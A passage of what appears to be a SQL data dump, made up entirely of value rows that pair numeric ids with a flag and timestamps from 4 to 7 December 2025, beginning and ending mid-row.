06:23:17'),(97953,3005,1,'2025-12-04','2025-12-04 06:28:57'),(97954,3707,1,'2025-12-04','2025-12-04 06:40:43'),(97955,2801,1,'2025-12-04','2025-12-04 06:55:10'),(97956,1730,1,'2025-12-04','2025-12-04 07:01:53'),(97957,4432,1,'2025-12-04','2025-12-04 07:06:17'),(97958,5657,1,'2025-12-04','2025-12-04 07:11:53'),(97959,5067,1,'2025-12-04','2025-12-04 07:22:35'),(97960,5657,1,'2025-12-04','2025-12-04 07:24:18'),(97961,5653,1,'2025-12-04','2025-12-04 07:25:02'),(97962,5067,1,'2025-12-04','2025-12-04 07:25:52'),(97963,1707,1,'2025-12-04','2025-12-04 07:26:56'),(97964,5457,1,'2025-12-04','2025-12-04 07:32:27'),(97965,472,1,'2025-12-04','2025-12-04 07:35:53'),(97966,3265,1,'2025-12-04','2025-12-04 07:36:37'),(97967,4529,1,'2025-12-04','2025-12-04 07:40:15'),(97968,4950,1,'2025-12-04','2025-12-04 07:42:41'),(97969,68,1,'2025-12-04','2025-12-04 07:44:47'),(97970,5657,1,'2025-12-04','2025-12-04 07:55:38'),(97971,89,1,'2025-12-04','2025-12-04 08:00:26'),(97972,2457,1,'2025-12-04','2025-12-04 08:04:59'),(97973,4668,1,'2025-12-04','2025-12-04 08:12:23'),(97974,5356,1,'2025-12-04','2025-12-04 08:19:18'),(97975,3117,1,'2025-12-04','2025-12-04 08:21:37'),(97976,2159,1,'2025-12-04','2025-12-04 08:24:36'),(97977,5536,1,'2025-12-04','2025-12-04 08:27:52'),(97978,5425,1,'2025-12-04','2025-12-04 08:38:34'),(97979,3181,1,'2025-12-04','2025-12-04 09:03:47'),(97980,3675,1,'2025-12-04','2025-12-04 09:14:50'),(97981,3096,1,'2025-12-04','2025-12-04 09:23:28'),(97982,4950,1,'2025-12-04','2025-12-04 09:29:32'),(97983,1768,1,'2025-12-04','2025-12-04 09:50:16'),(97984,4717,1,'2025-12-04','2025-12-04 10:07:34'),(97985,5639,1,'2025-12-04','2025-12-04 10:08:42'),(97986,91,1,'2025-12-04','2025-12-04 10:17:16'),(97987,5578,1,'2025-12-04','2025-12-04 10:22:54'),(97988,4408,1,'2025-12-04','2025-12-04 10:41:59'),(97989,1582,1,'2025-12-04','2025-12-04 10:43:40'),(97990,1582,1,'2025-12-04','2025-12-04 10:46:30'),(97991,5639,1,'2025-12-04','2025-12-04 10:49:45'),(97992,1614,1,'2025-12-04','2025-12-04 10:51:28'),(97993,1614,1,'2025-12-04','2025-12-04 10:52:18'),(97994,1614,1,'2025-12-04','2025-12-04 10:56:25'),(97995,4738,1,'2025-12-04','2025-12-04 10:59:13'),(97996,1604,1,'2025-12-04','2025-12-04 11:16:13'),(97997,1582,1,'2025-12-04','2025-12-04 11:37:10'),(97998,1608,1,'2025-12-04','2025-12-04 11:37:21'),(97999,1582,1,'2025-12-04','2025-12-04 11:42:36'),(98000,1608,1,'2025-12-04','2025-12-04 11:42:47'),(98001,5639,1,'2025-12-04','2025-12-04 11:46:10'),(98002,4759,1,'2025-12-04','2025-12-04 11:59:11'),(98003,1766,1,'2025-12-04','2025-12-04 12:01:42'),(98004,4556,1,'2025-12-04','2025-12-04 12:02:33'),(98005,74,1,'2025-12-04','2025-12-04 12:06:52'),(98006,5626,1,'2025-12-04','2025-12-04 12:08:02'),(98007,2751,1,'2025-12-04','2025-12-04 12:36:16'),(98008,4542,1,'2025-12-04','2025-12-04 12:56:52'),(98009,5406,1,'2025-12-04','2025-12-04 13:04:34'),(98010,5406,1,'2025-12-04','2025-12-04 13:04:36'),(98011,4573,1,'2025-12-04','2025-12-04 13:07:57'),(98012,5271,1,'2025-12-04','2025-12-04 13:17:47'),(98013,5639,1,'2025-12-04','2025-12-04 13:17:55'),(98014,74,1,'2025-12-04','2025-12-04 13:27:59'),(98015,5626,1,'2025-12-04','2025-12-04 13:28:45'),(98016,4323,1,'2025-12-04','2025-12-04 13:31:24'),(98017,3271,1,'2025-12-04','2025-12-04 13:33:58'),(98018,5639,1,'2025-12-04','2025-12-04 13:37:26'),(98019,4238,1,'2025-12-04','2025-12-04 13:39:28'),(98020,4845,1,'2025-12-04','2025-12-04 13:42:01'),(98021,5578,1,'2025-12-04','2025-12-04 13:42:07'),(98022,5146,1,'2025-12-04','2025-12-04 13:52:49'),(98023,5639,1,'2025-12-04','2025-12-04 13:58:35'),(98024,5295,1,'2025-12-04','2025-12-04 14:00:46'),(98025,3789,1,'2025-12-04','2025-12-04 14:04:32'),(98026,4950,1,'2025-12-04','2025-12-04 14:10:42'),(98027,5400,1,'2025-12-04','2025-12-04 14:16:43'),(98028,4950,1,'2025-12-04','2025-12-04 14:23:17'),(98029,80,1,'2025-12-04','2025-12-04 14:27:15'),(98030,4587,1,'2025-12-04','2025-12-04 14:30:54'),(98031,3704,1,'2025-12-04','2025-12-04 14:46:32'),(98032,2410,1,'2025-12-04','2025-12-04 14:48:29'),(98033,5428,1,'2025-12-04','2025-12-04 14:56:30'),(98034,4866,1,'2025-12-04','2025-12-04 15:23:18'),(98035,5280,1,'2025-12-04','2025-12-04 15:42:32'),(98036,5280,1,'2025-12-04','2025-12-04 15:43:36'),(98037,5649,1,'2025-12-04','2025-12-04 15:46:17'),(98038,4950,1,'2025-12-04','2025-12-04 15:51:13'),(98039,5657,1,'2025-12-04','2025-12-04 15:57:33'),(98040,5406,1,'2025-12-04','2025-12-04 15:57:42'),(98041,1705,1,'2025-12-04','2025-12-04 16:06:30'),(98042,3030,1,'2025-12-04','2025-12-04 16:12:55'),(98043,4546,1,'2025-12-04','2025-12-04 16:36:29'),(98044,5639,1,'2025-12-04','2025-12-04 16:41:28'),(98045,2904,1,'2025-12-04','2025-12-04 16:46:22'),(98046,5657,1,'2025-12-04','2025-12-04 16:53:56'),(98047,4874,1,'2025-12-04','2025-12-04 17:00:24'),(98048,1602,1,'2025-12-04','2025-12-04 17:01:50'),(98049,5428,1,'2025-12-04','2025-12-04 17:06:30'),(98050,5409,1,'2025-12-04','2025-12-04 17:37:10'),(98051,72,1,'2025-12-04','2025-12-04 17:38:21'),(98052,5649,1,'2025-12-04','2025-12-04 17:42:43'),(98053,5657,1,'2025-12-04','2025-12-04 17:42:43'),(98054,5653,1,'2025-12-04','2025-12-04 17:42:43'),(98055,1602,1,'2025-12-04','2025-12-04 17:43:25'),(98056,5653,1,'2025-12-04','2025-12-04 17:43:51'),(98057,5657,1,'2025-12-04','2025-12-04 17:43:52'),(98058,5649,1,'2025-12-04','2025-12-04 17:43:52'),(98059,5397,1,'2025-12-04','2025-12-04 17:53:46'),(98060,1703,1,'2025-12-04','2025-12-04 18:07:00'),(98061,467,1,'2025-12-04','2025-12-04 18:09:42'),(98062,4830,1,'2025-12-04','2025-12-04 18:22:50'),(98063,5657,1,'2025-12-04','2025-12-04 18:25:51'),(98064,5639,1,'2025-12-04','2025-12-04 18:33:53'),(98065,4520,1,'2025-12-04','2025-12-04 18:34:21'),(98066,1726,1,'2025-12-04','2025-12-04 18:36:35'),(98067,4779,1,'2025-12-04','2025-12-04 18:42:34'),(98068,5502,1,'2025-12-04','2025-12-04 18:50:26'),(98069,5567,1,'2025-12-04','2025-12-04 18:58:14'),(98070,3307,1,'2025-12-04','2025-12-04 18:59:20'),(98071,1705,1,'2025-12-04','2025-12-04 19:01:30'),(98072,3107,1,'2025-12-04','2025-12-04 19:02:25'),(98073,1728,1,'2025-12-04','2025-12-04 19:14:27'),(98074,5454,1,'2025-12-04','2025-12-04 19:29:29'),(98075,1872,1,'2025-12-04','2025-12-04 19:34:17'),(98076,5033,1,'2025-12-04','2025-12-04 20:16:34'),(98077,2751,1,'2025-12-04','2025-12-04 20:21:05'),(98078,5397,1,'2025-12-04','2025-12-04 20:25:05'),(98079,4977,1,'2025-12-04','2025-12-04 20:47:19'),(98080,5421,1,'2025-12-04','2025-12-04 20:47:41'),(98081,5515,1,'2025-12-04','2025-12-04 20:56:04'),(98082,1614,1,'2025-12-04','2025-12-04 21:02:40'),(98083,3226,1,'2025-12-04','2025-12-04 21:10:26'),(98084,4862,1,'2025-12-04','2025-12-04 21:20:55'),(98085,3030,1,'2025-12-04','2025-12-04 21:23:56'),(98086,469,1,'2025-12-04','2025-12-04 21:38:12'),(98087,480,1,'2025-12-04','2025-12-04 22:11:07'),(98088,5657,1,'2025-12-04','2025-12-04 22:21:23'),(98089,80,1,'2025-12-04','2025-12-04 22:24:29'),(98090,3486,1,'2025-12-04','2025-12-04 22:46:48'),(98091,72,1,'2025-12-04','2025-12-04 22:47:41'),(98092,5512,1,'2025-12-04','2025-12-04 22:58:55'),(98093,5457,1,'2025-12-04','2025-12-04 23:00:03'),(98094,5248,1,'2025-12-04','2025-12-04 23:00:46'),(98095,2503,1,'2025-12-04','2025-12-04 23:05:31'),(98096,2991,1,'2025-12-04','2025-12-04 23:11:15'),(98097,335,1,'2025-12-04','2025-12-04 23:14:37'),(98098,4556,1,'2025-12-04','2025-12-04 23:20:02'),(98099,4660,1,'2025-12-04','2025-12-04 23:42:52'),(98100,3097,1,'2025-12-05','2025-12-05 00:00:17'),(98101,5363,1,'2025-12-05','2025-12-05 00:15:45'),(98102,4424,1,'2025-12-05','2025-12-05 00:19:13'),(98103,3771,1,'2025-12-05','2025-12-05 00:25:12'),(98104,5028,1,'2025-12-05','2025-12-05 00:33:19'),(98105,4492,1,'2025-12-05','2025-12-05 00:37:04'),(98106,2813,1,'2025-12-05','2025-12-05 00:37:36'),(98107,4709,1,'2025-12-05','2025-12-05 00:39:52'),(98108,4983,1,'2025-12-05','2025-12-05 00:43:39'),(98109,5561,1,'2025-12-05','2025-12-05 00:48:05'),(98110,5454,1,'2025-12-05','2025-12-05 00:55:40'),(98111,3056,1,'2025-12-05','2025-12-05 01:09:10'),(98112,2775,1,'2025-12-05','2025-12-05 01:09:30'),(98113,5125,1,'2025-12-05','2025-12-05 01:13:38'),(98114,5609,1,'2025-12-05','2025-12-05 01:15:12'),(98115,72,1,'2025-12-05','2025-12-05 01:22:53'),(98116,5400,1,'2025-12-05','2025-12-05 01:51:36'),(98117,5515,1,'2025-12-05','2025-12-05 01:57:57'),(98118,5317,1,'2025-12-05','2025-12-05 01:59:46'),(98119,3290,1,'2025-12-05','2025-12-05 02:07:32'),(98120,5484,1,'2025-12-05','2025-12-05 02:13:45'),(98121,76,1,'2025-12-05','2025-12-05 02:17:15'),(98122,4642,1,'2025-12-05','2025-12-05 02:20:18'),(98123,5567,1,'2025-12-05','2025-12-05 02:37:49'),(98124,4660,1,'2025-12-05','2025-12-05 02:40:50'),(98125,3714,1,'2025-12-05','2025-12-05 02:46:01'),(98126,91,1,'2025-12-05','2025-12-05 02:50:07'),(98127,5276,1,'2025-12-05','2025-12-05 02:56:28'),(98128,4400,1,'2025-12-05','2025-12-05 02:57:50'),(98129,4645,1,'2025-12-05','2025-12-05 03:00:33'),(98130,5653,1,'2025-12-05','2025-12-05 03:00:44'),(98131,5374,1,'2025-12-05','2025-12-05 03:01:08'),(98132,3096,1,'2025-12-05','2025-12-05 03:03:27'),(98133,4457,1,'2025-12-05','2025-12-05 03:03:55'),(98134,5449,1,'2025-12-05','2025-12-05 03:08:21'),(98135,4681,1,'2025-12-05','2025-12-05 03:11:05'),(98136,5649,1,'2025-12-05','2025-12-05 03:16:54'),(98137,5492,1,'2025-12-05','2025-12-05 03:18:32'),(98138,5464,1,'2025-12-05','2025-12-05 03:20:22'),(98139,3489,1,'2025-12-05','2025-12-05 03:22:20'),(98140,335,1,'2025-12-05','2025-12-05 03:35:57'),(98141,4712,1,'2025-12-05','2025-12-05 03:42:03'),(98142,5489,1,'2025-12-05','2025-12-05 03:44:07'),(98143,3297,1,'2025-12-05','2025-12-05 03:56:02'),(98144,4420,1,'2025-12-05','2025-12-05 03:57:23'),(98145,5484,1,'2025-12-05','2025-12-05 03:58:10'),(98146,4722,1,'2025-12-05','2025-12-05 04:02:26'),(98147,5326,1,'2025-12-05','2025-12-05 04:03:53'),(98148,4719,1,'2025-12-05','2025-12-05 04:04:37'),(98149,4420,1,'2025-12-05','2025-12-05 04:06:21'),(98150,5307,1,'2025-12-05','2025-12-05 04:08:51'),(98151,5412,1,'2025-12-05','2025-12-05 04:09:37'),(98152,5657,1,'2025-12-05','2025-12-05 04:21:53'),(98153,1544,1,'2025-12-05','2025-12-05 04:23:37'),(98154,5304,1,'2025-12-05','2025-12-05 04:53:42'),(98155,4792,1,'2025-12-05','2025-12-05 05:04:24'),(98156,4870,1,'2025-12-05','2025-12-05 05:05:48'),(98157,3724,1,'2025-12-05','2025-12-05 05:15:15'),(98158,4983,1,'2025-12-05','2025-12-05 05:17:06'),(98159,3117,1,'2025-12-05','2025-12-05 05:17:21'),(98160,5298,1,'2025-12-05','2025-12-05 05:20:40'),(98161,3777,1,'2025-12-05','2025-12-05 05:31:00'),(98162,5545,1,'2025-12-05','2025-12-05 05:38:41'),(98163,3316,1,'2025-12-05','2025-12-05 05:38:50'),(98164,2503,1,'2025-12-05','2025-12-05 05:42:20'),(98165,2411,1,'2025-12-05','2025-12-05 05:42:34'),(98166,3774,1,'2025-12-05','2025-12-05 05:49:45'),(98167,5163,1,'2025-12-05','2025-12-05 05:50:02'),(98168,4744,1,'2025-12-05','2025-12-05 05:52:20'),(98169,5657,1,'2025-12-05','2025-12-05 05:56:11'),(98170,5037,1,'2025-12-05','2025-12-05 06:01:11'),(98171,1751,1,'2025-12-05','2025-12-05 06:01:22'),(98172,1598,1,'2025-12-05','2025-12-05 06:06:02'),(98173,5157,1,'2025-12-05','2025-12-05 06:07:58'),(98174,1774,1,'2025-12-05','2025-12-05 06:20:00'),(98175,5119,1,'2025-12-05','2025-12-05 06:20:13'),(98176,5037,1,'2025-12-05','2025-12-05 06:27:03'),(98177,5140,1,'2025-12-05','2025-12-05 06:29:21'),(98178,2965,1,'2025-12-05','2025-12-05 06:32:08'),(98179,1778,1,'2025-12-05','2025-12-05 06:34:22'),(98180,3313,1,'2025-12-05','2025-12-05 06:38:44'),(98181,4897,1,'2025-12-05','2025-12-05 06:39:09'),(98182,5561,1,'2025-12-05','2025-12-05 06:39:53'),(98183,5131,1,'2025-12-05','2025-12-05 06:45:57'),(98184,5441,1,'2025-12-05','2025-12-05 06:48:03'),(98185,477,1,'2025-12-05','2025-12-05 06:48:06'),(98186,72,1,'2025-12-05','2025-12-05 06:50:34'),(98187,5125,1,'2025-12-05','2025-12-05 06:51:06'),(98188,4612,1,'2025-12-05','2025-12-05 06:52:54'),(98189,5522,1,'2025-12-05','2025-12-05 06:57:52'),(98190,3752,1,'2025-12-05','2025-12-05 06:58:07'),(98191,4719,1,'2025-12-05','2025-12-05 07:00:37'),(98192,3096,1,'2025-12-05','2025-12-05 07:03:38'),(98193,1582,1,'2025-12-05','2025-12-05 07:08:47'),(98194,3027,1,'2025-12-05','2025-12-05 07:09:04'),(98195,3253,1,'2025-12-05','2025-12-05 07:18:32'),(98196,4341,1,'2025-12-05','2025-12-05 07:29:21'),(98197,5441,1,'2025-12-05','2025-12-05 07:31:15'),(98198,4576,1,'2025-12-05','2025-12-05 07:35:04'),(98199,4697,1,'2025-12-05','2025-12-05 07:36:44'),(98200,5378,1,'2025-12-05','2025-12-05 07:39:34'),(98201,5256,1,'2025-12-05','2025-12-05 07:40:30'),(98202,5326,1,'2025-12-05','2025-12-05 07:42:20'),(98203,479,1,'2025-12-05','2025-12-05 07:51:39'),(98204,4275,1,'2025-12-05','2025-12-05 08:04:47'),(98205,1728,1,'2025-12-05','2025-12-05 08:19:23'),(98206,1544,1,'2025-12-05','2025-12-05 08:23:23'),(98207,4750,1,'2025-12-05','2025-12-05 08:24:20'),(98208,5116,1,'2025-12-05','2025-12-05 08:32:14'),(98209,5502,1,'2025-12-05','2025-12-05 08:33:56'),(98210,5582,1,'2025-12-05','2025-12-05 08:39:52'),(98211,5657,1,'2025-12-05','2025-12-05 08:42:47'),(98212,5280,1,'2025-12-05','2025-12-05 08:52:41'),(98213,1604,1,'2025-12-05','2025-12-05 08:56:34'),(98214,1604,1,'2025-12-05','2025-12-05 08:56:36'),(98215,5320,1,'2025-12-05','2025-12-05 09:02:26'),(98216,2748,1,'2025-12-05','2025-12-05 09:16:24'),(98217,4950,1,'2025-12-05','2025-12-05 09:29:45'),(98218,5639,1,'2025-12-05','2025-12-05 09:29:53'),(98219,2503,1,'2025-12-05','2025-12-05 09:36:32'),(98220,5639,1,'2025-12-05','2025-12-05 09:36:40'),(98221,5317,1,'2025-12-05','2025-12-05 09:51:29'),(98222,74,1,'2025-12-05','2025-12-05 09:59:37'),(98223,68,1,'2025-12-05','2025-12-05 10:00:08'),(98224,5420,1,'2025-12-05','2025-12-05 10:10:28'),(98225,3710,1,'2025-12-05','2025-12-05 10:12:00'),(98226,91,1,'2025-12-05','2025-12-05 10:21:09'),(98227,91,1,'2025-12-05','2025-12-05 10:21:30'),(98228,4363,1,'2025-12-05','2025-12-05 10:32:03'),(98229,84,1,'2025-12-05','2025-12-05 10:33:46'),(98230,5113,1,'2025-12-05','2025-12-05 10:52:17'),(98231,3251,1,'2025-12-05','2025-12-05 10:58:42'),(98232,5436,1,'2025-12-05','2025-12-05 11:04:18'),(98233,3251,1,'2025-12-05','2025-12-05 11:12:39'),(98234,5420,1,'2025-12-05','2025-12-05 11:45:55'),(98235,5649,1,'2025-12-05','2025-12-05 12:44:53'),(98236,5639,1,'2025-12-05','2025-12-05 13:07:33'),(98237,4950,1,'2025-12-05','2025-12-05 13:36:58'),(98238,4612,1,'2025-12-05','2025-12-05 13:42:11'),(98239,3541,1,'2025-12-05','2025-12-05 13:44:11'),(98240,68,1,'2025-12-05','2025-12-05 13:44:37'),(98241,89,1,'2025-12-05','2025-12-05 13:45:01'),(98242,1586,1,'2025-12-05','2025-12-05 13:45:11'),(98243,5662,1,'2025-12-05','2025-12-05 13:45:30'),(98244,74,1,'2025-12-05','2025-12-05 13:46:10'),(98245,3694,1,'2025-12-05','2025-12-05 14:01:54'),(98246,3245,1,'2025-12-05','2025-12-05 14:29:36'),(98247,5461,1,'2025-12-05','2025-12-05 14:52:51'),(98248,3486,1,'2025-12-05','2025-12-05 14:57:56'),(98249,5484,1,'2025-12-05','2025-12-05 14:58:32'),(98250,5653,1,'2025-12-05','2025-12-05 15:41:27'),(98251,5639,1,'2025-12-05','2025-12-05 15:43:01'),(98252,5310,1,'2025-12-05','2025-12-05 15:46:27'),(98253,5492,1,'2025-12-05','2025-12-05 15:51:17'),(98254,1709,1,'2025-12-05','2025-12-05 15:56:42'),(98255,2704,1,'2025-12-05','2025-12-05 15:58:16'),(98256,5001,1,'2025-12-05','2025-12-05 16:07:28'),(98257,5639,1,'2025-12-05','2025-12-05 16:15:45'),(98258,5639,1,'2025-12-05','2025-12-05 16:17:33'),(98259,2558,1,'2025-12-05','2025-12-05 16:39:08'),(98260,110,1,'2025-12-05','2025-12-05 16:48:13'),(98261,4663,1,'2025-12-05','2025-12-05 16:50:28'),(98262,3280,1,'2025-12-05','2025-12-05 17:10:30'),(98263,5058,1,'2025-12-05','2025-12-05 17:21:00'),(98264,3438,1,'2025-12-05','2025-12-05 17:31:51'),(98265,5639,1,'2025-12-05','2025-12-05 17:42:49'),(98266,481,1,'2025-12-05','2025-12-05 17:52:39'),(98267,1745,1,'2025-12-05','2025-12-05 18:03:03'),(98268,5502,1,'2025-12-05','2025-12-05 18:05:00'),(98269,4722,1,'2025-12-05','2025-12-05 18:13:34'),(98270,3307,1,'2025-12-05','2025-12-05 18:15:23'),(98271,3285,1,'2025-12-05','2025-12-05 18:24:12'),(98272,5536,1,'2025-12-05','2025-12-05 18:34:45'),(98273,5412,1,'2025-12-05','2025-12-05 18:55:38'),(98274,1582,1,'2025-12-05','2025-12-05 19:00:19'),(98275,4391,1,'2025-12-05','2025-12-05 19:06:07'),(98276,4436,1,'2025-12-05','2025-12-05 19:16:48'),(98277,5397,1,'2025-12-05','2025-12-05 19:17:05'),(98278,4950,1,'2025-12-05','2025-12-05 19:32:24'),(98279,68,1,'2025-12-05','2025-12-05 19:37:30'),(98280,5433,1,'2025-12-05','2025-12-05 19:51:27'),(98281,4950,1,'2025-12-05','2025-12-05 20:37:25'),(98282,5639,1,'2025-12-05','2025-12-05 20:44:43'),(98283,5639,1,'2025-12-05','2025-12-05 20:44:48'),(98284,3710,1,'2025-12-05','2025-12-05 21:05:44'),(98285,5457,1,'2025-12-05','2025-12-05 21:14:26'),(98286,2154,1,'2025-12-05','2025-12-05 21:18:13'),(98287,4335,1,'2025-12-05','2025-12-05 22:09:28'),(98288,3034,1,'2025-12-05','2025-12-05 22:30:41'),(98289,2296,1,'2025-12-05','2025-12-05 22:49:30'),(98290,5400,1,'2025-12-05','2025-12-05 23:05:21'),(98291,1715,1,'2025-12-05','2025-12-05 23:16:17'),(98292,5425,1,'2025-12-05','2025-12-05 23:27:40'),(98293,4428,1,'2025-12-05','2025-12-05 23:49:29'),(98294,4400,1,'2025-12-05','2025-12-05 23:59:54'),(98295,3479,1,'2025-12-06','2025-12-06 00:17:42'),(98296,5489,1,'2025-12-06','2025-12-06 00:34:25'),(98297,4377,1,'2025-12-06','2025-12-06 00:37:02'),(98298,1604,1,'2025-12-06','2025-12-06 01:00:59'),(98299,5428,1,'2025-12-06','2025-12-06 01:10:26'),(98300,5561,1,'2025-12-06','2025-12-06 01:12:30'),(98301,5567,1,'2025-12-06','2025-12-06 01:31:15'),(98302,3045,1,'2025-12-06','2025-12-06 01:38:28'),(98303,5436,1,'2025-12-06','2025-12-06 01:58:59'),(98304,72,1,'2025-12-06','2025-12-06 02:00:03'),(98305,5420,1,'2025-12-06','2025-12-06 02:01:03'),(98306,2704,1,'2025-12-06','2025-12-06 02:02:01'),(98307,4983,1,'2025-12-06','2025-12-06 02:11:23'),(98308,3664,1,'2025-12-06','2025-12-06 02:24:57'),(98309,3486,1,'2025-12-06','2025-12-06 02:29:09'),(98310,4911,1,'2025-12-06','2025-12-06 02:35:38'),(98311,3790,1,'2025-12-06','2025-12-06 02:45:42'),(98312,5464,1,'2025-12-06','2025-12-06 02:52:44'),(98313,4712,1,'2025-12-06','2025-12-06 02:54:47'),(98314,5371,1,'2025-12-06','2025-12-06 02:57:45'),(98315,1745,1,'2025-12-06','2025-12-06 03:18:29'),(98316,5383,1,'2025-12-06','2025-12-06 03:47:31'),(98317,2617,1,'2025-12-06','2025-12-06 04:14:04'),(98318,3290,1,'2025-12-06','2025-12-06 04:24:36'),(98319,80,1,'2025-12-06','2025-12-06 04:36:02'),(98320,4329,1,'2025-12-06','2025-12-06 04:37:02'),(98321,5353,1,'2025-12-06','2025-12-06 04:49:34'),(98322,2309,1,'2025-12-06','2025-12-06 05:14:41'),(98323,5323,1,'2025-12-06','2025-12-06 05:17:03'),(98324,5573,1,'2025-12-06','2025-12-06 05:39:51'),(98325,4454,1,'2025-12-06','2025-12-06 05:46:22'),(98326,1734,1,'2025-12-06','2025-12-06 05:51:32'),(98327,1544,1,'2025-12-06','2025-12-06 06:15:59'),(98328,4326,1,'2025-12-06','2025-12-06 06:17:42'),(98329,3027,1,'2025-12-06','2025-12-06 06:20:46'),(98330,3027,1,'2025-12-06','2025-12-06 06:21:00'),(98331,5657,1,'2025-12-06','2025-12-06 06:58:48'),(98332,471,1,'2025-12-06','2025-12-06 07:02:56'),(98333,4546,1,'2025-12-06','2025-12-06 07:20:04'),(98334,5639,1,'2025-12-06','2025-12-06 07:26:25'),(98335,5545,1,'2025-12-06','2025-12-06 07:30:39'),(98336,5657,1,'2025-12-06','2025-12-06 08:34:44'),(98337,3056,1,'2025-12-06','2025-12-06 08:36:29'),(98338,1745,1,'2025-12-06','2025-12-06 08:57:24'),(98339,3675,1,'2025-12-06','2025-12-06 09:27:54'),(98340,5649,1,'2025-12-06','2025-12-06 09:38:57'),(98341,3072,1,'2025-12-06','2025-12-06 10:01:48'),(98342,5639,1,'2025-12-06','2025-12-06 10:10:15'),(98343,3781,1,'2025-12-06','2025-12-06 10:11:13'),(98344,5639,1,'2025-12-06','2025-12-06 10:18:33'),(98345,5639,1,'2025-12-06','2025-12-06 10:19:06'),(98346,91,1,'2025-12-06','2025-12-06 10:23:23'),(98347,1584,1,'2025-12-06','2025-12-06 10:58:53'),(98348,5649,1,'2025-12-06','2025-12-06 11:28:50'),(98349,5298,1,'2025-12-06','2025-12-06 11:50:56'),(98350,5425,1,'2025-12-06','2025-12-06 12:14:15'),(98351,2457,1,'2025-12-06','2025-12-06 12:26:19'),(98352,1743,1,'2025-12-06','2025-12-06 12:39:08'),(98353,2410,1,'2025-12-06','2025-12-06 13:00:56'),(98354,4950,1,'2025-12-06','2025-12-06 13:09:21'),(98355,84,1,'2025-12-06','2025-12-06 13:09:47'),(98356,4697,1,'2025-12-06','2025-12-06 13:47:00'),(98357,5076,1,'2025-12-06','2025-12-06 14:11:44'),(98358,5076,1,'2025-12-06','2025-12-06 14:12:45'),(98359,5024,1,'2025-12-06','2025-12-06 14:17:41'),(98360,4674,1,'2025-12-06','2025-12-06 15:11:50'),(98361,2156,1,'2025-12-06','2025-12-06 15:56:49'),(98362,4980,1,'2025-12-06','2025-12-06 16:11:05'),(98363,4448,1,'2025-12-06','2025-12-06 16:27:26'),(98364,4983,1,'2025-12-06','2025-12-06 16:31:03'),(98365,5657,1,'2025-12-06','2025-12-06 16:31:51'),(98366,5657,1,'2025-12-06','2025-12-06 16:31:53'),(98367,1728,1,'2025-12-06','2025-12-06 16:58:19'),(98368,4747,1,'2025-12-06','2025-12-06 17:10:53'),(98369,3781,1,'2025-12-06','2025-12-06 17:20:14'),(98370,3069,1,'2025-12-06','2025-12-06 17:21:15'),(98371,5515,1,'2025-12-06','2025-12-06 17:24:17'),(98372,3752,1,'2025-12-06','2025-12-06 17:26:21'),(98373,3777,1,'2025-12-06','2025-12-06 17:30:27'),(98374,5512,1,'2025-12-06','2025-12-06 17:34:38'),(98375,4660,1,'2025-12-06','2025-12-06 17:36:42'),(98376,5570,1,'2025-12-06','2025-12-06 17:38:47'),(98377,5454,1,'2025-12-06','2025-12-06 17:41:54'),(98378,4529,1,'2025-12-06','2025-12-06 17:46:02'),(98379,3175,1,'2025-12-06','2025-12-06 17:49:45'),(98380,3175,1,'2025-12-06','2025-12-06 17:49:57'),(98381,5578,1,'2025-12-06','2025-12-06 17:51:13'),(98382,4722,1,'2025-12-06','2025-12-06 17:58:25'),(98383,5412,1,'2025-12-06','2025-12-06 17:58:25'),(98384,5406,1,'2025-12-06','2025-12-06 18:02:31'),(98385,3117,1,'2025-12-06','2025-12-06 18:03:33'),(98386,2904,1,'2025-12-06','2025-12-06 18:05:38'),(98387,5662,1,'2025-12-06','2025-12-06 18:06:00'),(98388,3038,1,'2025-12-06','2025-12-06 18:07:53'),(98389,5409,1,'2025-12-06','2025-12-06 18:08:52'),(98390,1724,1,'2025-12-06','2025-12-06 18:09:32'),(98391,5125,1,'2025-12-06','2025-12-06 18:10:02'),(98392,5441,1,'2025-12-06','2025-12-06 18:10:02'),(98393,479,1,'2025-12-06','2025-12-06 18:15:32'),(98394,4977,1,'2025-12-06','2025-12-06 18:23:46'),(98395,4950,1,'2025-12-06','2025-12-06 18:24:12'),(98396,3259,1,'2025-12-06','2025-12-06 18:29:24'),(98397,5449,1,'2025-12-06','2025-12-06 18:32:06'),(98398,5461,1,'2025-12-06','2025-12-06 18:45:57'),(98399,4744,1,'2025-12-06','2025-12-06 18:49:00'),(98400,5492,1,'2025-12-06','2025-12-06 18:50:17'),(98401,110,1,'2025-12-06','2025-12-06 18:55:37'),(98402,4681,1,'2025-12-06','2025-12-06 18:55:38'),(98403,474,1,'2025-12-06','2025-12-06 19:08:31'),(98404,3083,1,'2025-12-06','2025-12-06 19:23:48'),(98405,4301,1,'2025-12-06','2025-12-06 19:56:47'),(98406,4492,1,'2025-12-06','2025-12-06 20:11:11'),(98407,3109,1,'2025-12-06','2025-12-06 20:20:18'),(98408,4404,1,'2025-12-06','2025-12-06 20:25:16'),(98409,3531,1,'2025-12-06','2025-12-06 20:39:43'),(98410,4627,1,'2025-12-06','2025-12-06 20:53:52'),(98411,5649,1,'2025-12-06','2025-12-06 21:18:06'),(98412,3124,1,'2025-12-06','2025-12-06 21:45:31'),(98413,2801,1,'2025-12-06','2025-12-06 22:09:03'),(98414,4529,1,'2025-12-06','2025-12-06 22:32:03'),(98415,5071,1,'2025-12-06','2025-12-06 22:55:29'),(98416,2993,1,'2025-12-06','2025-12-06 23:18:27'),(98417,3257,1,'2025-12-06','2025-12-06 23:23:32'),(98418,5557,1,'2025-12-07','2025-12-07 00:03:00'),(98419,478,1,'2025-12-07','2025-12-07 00:44:59'),(98420,4911,1,'2025-12-07','2025-12-07 01:20:30'),(98421,1705,1,'2025-12-07','2025-12-07 01:22:40'),(98422,4911,1,'2025-12-07','2025-12-07 01:27:40'),(98423,1722,1,'2025-12-07','2025-12-07 01:29:30'),(98424,5441,1,'2025-12-07','2025-12-07 01:40:48'),(98425,5157,1,'2025-12-07','2025-12-07 01:51:01'),(98426,1743,1,'2025-12-07','2025-12-07 01:54:44'),(98427,3731,1,'2025-12-07','2025-12-07 01:59:58'),(98428,106,1,'2025-12-07','2025-12-07 02:18:54'),(98429,4930,1,'2025-12-07','2025-12-07 02:57:09'),(98430,5492,1,'2025-12-07','2025-12-07 03:14:24'),(98431,5639,1,'2025-12-07','2025-12-07 03:17:48'),(98432,5639,1,'2025-12-07','2025-12-07 03:19:19'),(98433,1703,1,'2025-12-07','2025-12-07 03:22:38'),(98434,468,1,'2025-12-07','2025-12-07 03:32:34'),(98435,1743,1,'2025-12-07','2025-12-07 03:44:08'),(98436,2395,1,'2025-12-07','2025-12-07 04:01:19'),(98437,76,1,'2025-12-07','2025-12-07 